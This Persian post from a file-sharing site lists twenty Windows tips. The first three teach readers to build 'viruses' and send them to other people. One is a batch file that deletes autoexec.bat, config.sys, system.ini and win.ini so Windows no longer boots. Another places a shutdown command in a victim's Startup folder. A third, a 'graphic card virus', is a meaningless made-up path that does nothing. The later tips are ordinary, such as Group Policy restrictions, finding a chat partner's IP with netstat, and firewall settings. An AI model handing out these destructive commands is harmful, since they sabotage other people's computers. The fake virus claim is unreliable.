نام نویسنده: سعید زمانی

امتیاز کاربر: 170

تاریخ عضویت: یکشنبه ۹ دی ۱۳۹۷

تعداد مطالب:51 پست

بازدید معمولی ازمطالب : 1586 نفر

سطح کاربری: کــاربر ویــژه

رتبه4 از 5

سطح فعالیت : تـــازه کار

تحقیق در مورد ترفندهای ویندوز-ترفندها

 • 0 نظر
 • رتبه1 از 5
 • یکشنبه ۱۵ اردیبهشت ۱۳۹۸
 • تحقیق در مورد ترفندهای ویندوز-ترفندها sfile رتبه بندی: 1 از 5

  سر فصل ها:
  ساختن ويروسي که خطرش پاک کردن ويندوز است
  ( ويروس بسيار خطرناک )Graphic card hower2)
  3)ساخت ويروس بلاستر:
  :Xp4) پسوردي قوي براي ويندوز
  :Cmd يا Command Prompt 5)محدود کردن دسترسي به
  6)محدود کردن دسترسي به CONTROL PANEL :
  رجيستری: 7-محدود کردن دسترسي به
  دید ;کلی:
  با اجراي اين ويروس کامپيوتر ري استارت شده و ديگر ويندوز بالا نمي آيد! ابتدا برنامه
  ويندوز را باز کنيد، سپس اين عبارت را در آن تايپ کنيد. Notepad
  Del autoexec.bat del config.sys cd winnt del system.ini del win.ini
  ذخيره کنيد.اين فايل را وقتي براي کسي بفرستيد هيچ اتفاقي نمي افتد.Bat سپس فايل را با پسوند
  به محض آن که کامپيوتر را ري استارت کند بار بعدي ويندوز را نخواهد ديد. اما

  1- ساختن ويروسي که خطرش پاک کردن ويندوز است.
  با اجراي اين ويروس کامپيوتر ري استارت شده و ديگر ويندوز بالا نمي آيد! ابتدا برنامه
  ويندوز را باز کنيد، سپس اين عبارت را در آن تايپ کنيد. Notepad
  Del autoexec.bat del config.sys cd winnt del system.ini del win.ini
  ذخيره کنيد.اين فايل را وقتي براي کسي بفرستيد هيچ اتفاقي نمي افتد.Bat سپس فايل را با پسوند
  به محض آن که کامپيوتر را ري استارت کند بار بعدي ويندوز را نخواهد ديد.
  2- ( ويروس بسيار خطرناک )Graphic card hower2) ويروس
  حواستان باشديک بارهم روي سيستم خود امتحان نکنيد.اين ويروس فضاي کارت گرافيک راپرمي کند
  و اجازه ي اجراي هيچ بازي بر روي سيستم را نمي دهد.
  را باز کنيد و در آن عبارات زير را تايپ کنيد: Notepadابتدا
  c/windows/system32/jefo/display/memory/full
  ذخيره کنيد. اکنون ويروس شما آماده مي باشد. XXX.Batاين فايل را با اسم
  3- ساخت ويروس بلاستر:
  حتما اسم ويروس بلاستر را شنيده ايد، دوست داريد اين ويروس را خودتان بسازيد؟!
  را اجرا کنيد.Notepad1) نرم افزار
  2) يکي از دستورات زير را در آن تايپ نمائيد:
  Shutdown-s-t xx
  مدت زماني که قرار است کامپيوتر خاموش شود را بگذاريد. xx3) به جاي
  ذخيره کنيد..bat4) فايل را با پسوند
  سيستم بخت برگشته اي بگذاريد،کارش تمام است!Startup5) اگر زرنگ باشيد و اين فايل را در
  براي خنثي کردن اين ويروس ، تاريخ يا ساعت سيستم خود را (حين اجرا)به عقب برگردانيد.
  4-پسوردي قوي براي ويندوز
  توجه کنيد که اين پسورد قويترين پسورد است و اگر در موقع وارد نمودن پسورد سه بار اشتباه کنيد کامپيوتر دوباره راه اندازي مي شود و اگر رمز را فراموش کنيد ديگر راهي براي ورود به کامپيوتر نداريد.پس دقت کنيد که پسورد را فراموش نکنيد!
  براي اين منظور:
  را بزنيد.Syskey و سپس فرمانrun زيرمنوي Start1) از منوي
  را زده.Update2) در پنجره باز شده گزينه
  3)در اين قسمت پسوردي را براي کامپيوترتان انتخاب کنيد، با گزينه هاي ديگر هم کار کنيد.

  5- محدود کردن دسترسي به Cmd يا Command Prompt

  را بزنيد.Okرا تايپ کنيدو دکمه gpedit.msc عبارتrunبرويد ودر runبه startاز منوي
  User Configuration/Administrative Templates/System
  دوبارکليک کنيد،درپنجره Prevent access to the command prompt حال درقسمت راست روي گزينه
  عبارتRunرا ببنديد. حال در Gpedit.msc کنيد و پنجره Ok را فعال کرده و Enableاي که باز مي شود گزينه
  Command Prompt بازشود.خواهيد ديدباپيامي مبني بربسته بودن Command Promptکنيد تا تايپ راCmd
  را دوباره اجرا کنيد، مسير گفته شده را دنبال کرده و اين بار به Cmdمواجه مي شويد. براي آنکه بتوانيد
  را انتخاب کنيد. Enable ، Not Configured جاي
  6-محدود کردن دسترسي به CONTROL PANEL
  از منوي StarبهRunبرويد و درRunتايپ کنيد Gpedit.mscوOkرا بزنيد. در پنجره ظاهر شده مسير زير را دنبال کنيد:
  User Configuration/Administrative Templates/Control Panel
  حال در قسمت راست روي گزينه Prohibit access to the control panelدوبار کليک کنيد،درپنجره اي که بازمي شودگزينهEnable را فعال نموده وOk کنيد. همچنين براي اينکه همه چيزرابه حالت اول برگردانيد،مسيرگفته شده رادنبال کرده واين بار به جاي Enable ، Not Configured را انتخاب کنيد.
  7- محدود کردن دسترسي بهرجيستری
  را بزنيد.Okرا تايپ کنيدو دکمه gpedit.msc عبارتrunبرويد ودر runبه startاز منوي
  User Configuration/Administrative Templates/System
  دوبارکليک کنيد،درپنجره Prevent access to registry editing tools حال درقسمت راست روي گزينه
  عبارتRunرا ببنديد. حال در Gpedit.msc کنيد و پنجره Ok را فعال کرده و Enableاي که باز مي شود گزينه
  رجيستري مواجه مي شويد. براي بازشود.خواهيد ديدباپيامي مبني بربسته بودن رجيستري کنيد تا تايپ راRegedit
  را دوباره اجرا کنيد، مسير گفته شده را دنبال کرده و اين بار به رجيستري آنکه بتوانيد
  را انتخاب کنيد. Enable ، Not Configured جاي
  8-روشي براي پيدا کردن IP
  در چت روش هاي زيادي وجود دارد اما اين روش بهترين روش است.Ipبراي پيدا کردن
  ابتدا يک پيغام به شخص مورد نظر فرستاده سپس منتظر جواب شويد وبعدازاين که جوابي رادريافت
  را تايپ ميکنيم.Netstat-nعبارت ميريم وDos نموديد به محيط
  شخص مقابل مي شود.Ip با پورت 5101يا 5103 ipبعد

  9-گذشتن از فيلتر به وسيله ي ويندوز
  در منوي run دستور nslookupرا اجرا کنيد نشاني سايت موردنظر راواردکنيد.
  وسپس Enter رافشار دهيد تا ip آن رابه دست آوريد .
  سپس IPرا در قسمت آدرس Internet Explorer بنويسيدو Enter بزنيد.
  10-چگونه IPخود را از دسترس هکرها مخفي نگه داريم؟
  را تايپ نمائيد.MMCعبارت runرفته و در محيط run به start1-ابتدا از منوي
  برويد.Add emove snap-in به قسمتFile2-در محيط جديد از منوي،
  کليک کنيد.Add 3-در پنجره باز شده بر روي دکمه
  را بزنيد.Add کليک کرده و دکمهIp Security Policy Management4-در پنجره جديد بر روي
  را زده و خارج شويد.Finish 5-سپس
  کليک کنيد.Ok6-در پنجره قبلي بر روي
  Ip Security Policy Management 7-حال در همان محيط اوليه هستيد.آيکن کناري عبارت
  زرد رنگ است. اکنون مي بايست يک بار بر روي آن کليک کنيد تا رنگ آن به سبز تغيير پيدا کند.
  اين عمليات را ذخيره کنيد.Yes رفته و با انتخابExitبه File8-در پايان از منوي
  11-چگونه از ويندوز خود در برابر هکرها محافظت کنيم ؟
  ويندوز اکس پي براي راحتي حال کاربران خود يک سيستم مقابله با ويروس ها و هکرها را در درون خود گنجانده است. براي فعال سازي آن:
  برويد.Control Panel به Start1-از منوي
  کليک کنيد.Network and Internet Connections 2-بر روي
  را انتخاب کنيد.Network Connections 3-سپس
  را انتخاب کنيد. Properties 4-حال بر روي اتصال اينترنت خود، کليک راست کرده و از منوي باز شده
  را فعال کنيد.Internet Connection Firewall گزينه ي Tab, Advanced5-از
  کليک کنيد. OK 6-سپس بر روي
  12-کامپيوتر شما از چه زماني روشن بوده است؟
  با استفاده از ترفندي که به شما معرفي مي کنيم مي توانيد به راحتي و با تايپ يک دستور بفهميد که از مدت زمان روشن بودن کامپيوتر شما چه مدت گذشته است.
  را تايپ کنيد.در پنجره باز شده دستورcmd برويدو عبارتRun بهStartبراي اين کار از
  را تايپ کنيد . خواهيد ديد که متوني ظاهر مي گردد. Net statistics workstation
  مي توانيد زمان و تاريخ روشن شدن Statistics sinceدر بالاترين قسمت و در مقابل
  سيستم را ببينيد.
  13-حافظه مجازی
  حافظه مجازي قسمتي از حافظه ديسک سخت است که به صورت موقت دراختيارسيستم عامل قرار مي گيرد، ويندوز از اين فضا براي نگهداري داده هاي موقت خودش استفاده ميکند، مقدار پيش فرض اين حافظه که توسط ويندوزتعيين ميشود بهترين انتخاب است وبندرت پيش مي آيدکه کسي بخواهد آن را تغيير دهد، در صورتي که کسي به خاطرکمبود فضاي ديسک سخت، ميزان حافظه مجازي را تغيير دهد، مسلما با افت سرعت سيستم مواجه مي شود، همچنين کسي که آن را به حداکثر برساند باعث مي شود فضاي بيشتري از ديسک در اختيار سيستم عامل قرار بگيرد که مديريت آن باز هم موجب کاهش سرعت مي شود.
  براي افزايش يا کاهش حافظه مجازي مراحل زير را دنبال کنيد:
  را انتخاب کنيد.Properties کليک راست کرده و My Computer1-بر روي
  را انتخاب کنيدAdvanced) برگه system properties 2- در پنجره اي که ظاهر ميشود (
  کليک کنيد.Settingsروي performanceو در قسمت
  را انتخاب کنيد و در قسمت Advanced ) برگه performance options3- در اين پنجره (
  کليک کنيد.Changeروي دکمه virtualmemory
  کليک کنيد، حالا در Paing file size for selected drive4-در پنجره ظاهر شده در قسمت
  فضاي دلخواهتان را بر حسب مگابايت تعيين کنيد. و روي دکمهInitial size(MB)کادر جلوي
  کليک کرده تا تغييرات اعمال شود.Ok کليک کنيد و سپس رويset
  14-مشاهده مشخصات جزئي ويندوز
  اگر ميخواهيد از مشخصات جزئي رايانه خود از قبيل نگارش ويندوز , نوع CPU و بايوس,مقدار حافظه اصلي و گرافيکي,نگارشdirectx وراه اندازهاي مختلف رايانه مطلع شويد کافي است از منويRun دستورdxdiag را اجرا کنيد.
  همچنين شما قادر خواهيد بود اين مشخصات را به صورت يک فايل متني ذخيره کنيد. قبل از ورود به اين محيط ويندوز راه اندازهاي موجود در رايانه شما را تست کرده و در صورت وجود خطا شما را از آن مطلع مي سازد.
  15-قفل کردن کامپیوتر
  هنگامي که کامپيوتر خود را براي مدتي ترک مي کنيد .ممکن است شخص ديگري از اين فرصت استفاده کند و از کامپيوتر شما سوء استفاده کند.

  براي جلوگيري از اين کار مي توانيد درهنگام ترک کامپيوتر آن را قفل کنيد.در ويندوز xp با فشردن کليد هاي ويندوز و L / در ويندوز 2000 با فشردن کليدهاي ctrl+Alt+Del و سپس انتخاب Lock computer ميتوانيد اين کارراانجام دهيد.
  يکي از مزاياي قفل کردن کامپيوتر بجاي logoutکردن اين است که برنامه در اين حالت به اجراي خود ادامه مي دهند و لازم نيست از برنامه ها خارج شويد و پنجره هاي مختلف را ببنديد .
  16-غير فعال کردن گزارش خطا در ويندوز
  کليک کنيد.حالا رويAdvanced شويد ، روي برگهsystem رفته ، بعد واردcontrol panel به
  را انتخاب کرده و با Disable error reportingدر زير پنجره کليک کنيد.error-reporting
  از صفحات خارج شويد.ok زدن
  17-ويندوزاستفاده کرد؟Backgroundچگونه ميتوان يک فايل ويديوئي رابه عنوان
  در ابتدابايدگفت با اين کار نه به سيستم فشار مي آيد و نه سرعتش کم ميشود فقط لحظه ي راه اندازي ويندوز معمولا ۱۰-20 ثانيه ديرتر بالا ميايد وديگر هيچ مشکلي به وجود نمي آيد. شما بگذاريد علاوه بر عکسهاي پيش فرض ويندوز background وقتي که ميخواهيدبراي کامپيوترتان
  از هارد يک فايل را انتخاب کنيد که اين فايل ميتواند يک Browsميتوانيد با کليک بر روي دکمه
  .باشد. htmعکس معمولي يا عکس متحرک و يافايل
  . براي پس زمينه بگذاريم و هرويژگي که بخواهيم ميتوانيم دراين فايل htm ما ميتوانيم يک فايل
  جا دهيم مثل پخش فيلم،موزيک يا...
  file براي ساخت اين فايل نوت پد ويندوز رااجرا ميکنيم ودستور زير رادرآن تايپ کرده بعد از منوي
  . ذخيره ميکنيم بعداين فايل راپس زمينه ويندوز ميگذاريم. Htm را ميزنيم وفايل راباپسوند save as
  نوت پد را باز کرده بعد اين دستورها رادر آن بنويسيد:
  body bgcolor="black" onLoad="fall()"
  p align="center" /p
  p align="center" /p
  p align="center" /p
  p align="center" /p
  p align="center" /p
  p align="center" /p
  p align="center"
  img border="0" dynsrc="file:///H:/ %20(15).avi" start="fileopen"/p
  آدرس کامل فايل خود را نوشته و (H:/ %20(15).avi) در اين دستور به جاي اين قسمت
  .ذخيره کرده وبراي پس زمينه ويندوز خود آن را انتخاب کنيد.Htmسپس آن را باپسوند

  18-کپي کردن سي دي خش دار
  براي کپي کردن سي دي خش دار بر روي هارد مراحل زير را انجام مي دهيم:
  Briefcase و سپسNew1- در يک محل از درايو کليک راست نمائيدو در منوي باز شده گزينه ي
  (کيف دستي) را بزنيد.
  کنيد.paste 2- بر روي آيکن ايجاد شده دو بار کليک کنيد و فايل خراب را در اين قسمت
  3-با اين روش در فيلم ، آن مقدار که سالم است را خواهيد ديد.(اين روش بي خطر هم هست.)
  19-ساده ترين راه براي اينکه بفهميم ويندوزي که هم اکنون با آن بالا آمده ايم در کدام پارتيشن نصب شده
  براي فهم اين مطلب مي توانيد پنجره My Computer را فعال نموده و سپس در نوارAddress کليد بک اسلاش () رابزنيد و بعد دکمهEnter به اين ترتيب مستقيماً وارد درايوي مي شويد که از آنجا ويندوز بالا آمده است و با اين روش نشاني و پارتيشن نصب ويندوز در حال اجرا را مشاهده مي کنيد.
  20-ساخت کليد ميانبر براي نرم افزارهاي مختلف
  براي اين کار کافي است:
  ابتدا يک Shortcutاز برنامه درست کنيد.
  (برروي آيکون آن راست کليک کرده و Create Shortcut را بزنيد)
  سپس بررويShortcut ساخته شده راست کليک کرده وProperties رابرگزينيد. در تب ،Shortcut ودر قسمت Shortcut Keyکليک کنيد ودرهمين زمان کليد ميانبري را که ميخواهيد،اجرا کنيد.
  ( مثلا همزمان کليدهاي Ctrl+Alt+Wرافشاردهيد)در پايان OKرا زده و خارج شويد.از اين زمان به بعد در هر جايي ازويندوزاين کليدها را همزمان بفشاريد برنامه تعيين شده اجرا ميشود.


  تحقیق آماده | | بازدید | :sfile

  ارسال دیدگاه برای پست : تحقیق در مورد ترفندهای ویندوز-ترفندها

  به نظر تان در اس فایل چه مطالبی درج شود؟

  لطفا اتصال به اینترنت را چک نمائید